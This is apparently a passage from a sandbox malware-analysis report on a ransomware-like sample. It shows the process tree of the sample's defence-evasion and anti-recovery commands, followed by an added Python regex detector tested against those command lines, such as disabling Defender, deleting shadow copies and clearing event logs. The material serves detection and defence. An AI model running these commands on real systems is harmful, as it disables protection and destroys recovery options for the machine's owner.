C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2092 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2112
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2136 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2168 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2264
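The child processes above are the sample's pre-encryption routine: Defender is switched off three ways (policy registry values, service Start=4 which is SERVICE_DISABLED, and Set-MpPreference), its ETW autologgers, scheduled tasks, autorun entries and shell integration are removed, definitions are deleted, then shadow copies are destroyed, recovery is disabled in the BCD store, and the System, Security and Application logs are cleared. The following is an added example, not part of the Triage report or its signature engine: a small rule set over process-creation command lines that tags each of those actions, run against the command lines from this tree plus two lines that should not fire (a constructed benign reg.exe write, and the report's own "wmic SHADOWCOPY /nointeractive", which only enumerates shadow copies). The technique IDs are the current ATT&CK Enterprise sub-technique numbers, an assumption on top of the "v6" header this report uses.

```python
"""Tag Defender-tampering and recovery-inhibiting command lines.

Added example (author's rules, not Triage signatures). Each rule is a regex
over one process-creation command line (Sysmon EID 1 / Security 4688
CommandLine); a hit yields a rule name and an ATT&CK technique ID.
"""
import re
from collections import Counter

# Command lines copied from the process tree above, plus one constructed
# benign line ("HKCU\Software\Example") that must not match any rule.
SAMPLE_CMDLINES = [
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wevtutil.exe cl security',
    r'wmic.exe shadowcopy delete',
    r'bcdedit.exe /set {default} recoveryenabled no',
    r'bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    r'reg.exe add "HKCU\Software\Example" /v "Foo" /t REG_DWORD /d "1" /f',  # constructed, benign
    r'wmic.exe SHADOWCOPY /nointeractive',  # from the tree above; enumeration only
]

# (rule name, ATT&CK technique ID, pattern). Patterns are anchored on the
# exact keys/values this sample writes so that ordinary reg.exe use is ignored.
RULES = [
    ("defender_policy_tamper", "T1562.001",
     r'reg(?:\.exe)?\s+add\s+"?HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\'),
    ("defender_etw_logger_off", "T1562.006",
     r'Autologger\\Defender(?:Api|Audit)Logger"?\s+/v\s+"?Start"?\s+/t\s+REG_DWORD\s+/d\s+"?0"?'),
    ("defender_service_disabled", "T1562.001",   # Start=4 is SERVICE_DISABLED
     r'Services\\(?:WdBoot|WdFilter|WdNisDrv|WdNisSvc|WinDefend|SecurityHealthService)"?\s+/v\s+"?Start"?\s+/t\s+REG_DWORD\s+/d\s+"?4"?'),
    ("defender_task_disabled", "T1562.001",
     r'schtasks(?:\.exe)?\s+/Change\s+/TN\s+"?Microsoft\\Windows\\(?:Windows Defender|ExploitGuard)\\.*?/Disable'),
    ("defender_shell_integration_removed", "T1112",
     r'reg(?:\.exe)?\s+delete\s+"?HKCR\\.*?\\shellex\\ContextMenuHandlers\\EPP'),
    ("defender_autorun_removed", "T1112",
     r'reg(?:\.exe)?\s+delete\s+"?HK(?:LM|CU)\\.*?\\Run"?\s+/v\s+"?Windows ?Defender'),
    ("shadow_copy_deleted", "T1490",
     r'vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete'),
    ("boot_recovery_disabled", "T1490",
     r'bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)'),
    ("event_log_cleared", "T1070.001",
     r'wevtutil(?:\.exe)?\s+cl\s+\S+'),
    ("defender_definitions_removed", "T1562.001",
     r'MpCmdRun(?:\.exe)?"?\s+-RemoveDefinitions'),
    ("defender_preference_disabled", "T1562.001",
     r'Set-MpPreference\s+-Disable\w+\s+\$true'),
]
COMPILED = [(name, tech, re.compile(pat, re.IGNORECASE)) for name, tech, pat in RULES]


def classify(cmdline):
    """Return every (rule_name, technique) whose pattern matches one command line."""
    return [(name, tech) for name, tech, rx in COMPILED if rx.search(cmdline)]


def summarize(cmdlines):
    """Count hits per technique and collect the command lines no rule explains."""
    by_technique = Counter()
    unmatched = []
    for cmd in cmdlines:
        hits = classify(cmd)
        if not hits:
            unmatched.append(cmd)
        for _, tech in hits:
            by_technique[tech] += 1
    return by_technique, unmatched


if __name__ == "__main__":
    counts, leftovers = summarize(SAMPLE_CMDLINES)
    for tech, n in sorted(counts.items()):
        print(f"{tech}: {n} command line(s)")
    for cmd in leftovers:
        print("no rule:", cmd)
```

On a real feed, run classify() over the CommandLine field of process-creation events and alert when several distinct techniques fire from one parent within a short window; any single rule here is also a reasonable stand-alone alert, since none of these commands is part of normal administration on a workstation.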
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5 6360a06b3d4c4c25751261ee8344d003
  SHA1 0d22d117921e5722a5c4d5821023a49eb1e8e51b
  SHA256 9b8d58886f8a6e896c97c37a048bce003b9ace4a90ac46007c39d859569cf03e
  SHA512 790b27a4c35e3c6764b033b0ebd21ccd1b87ddfeeb65a4b067192305feb7cc7189947d9a9243905f5d80131a2262ac04430f7f146de4f5d130e0b81478b3e555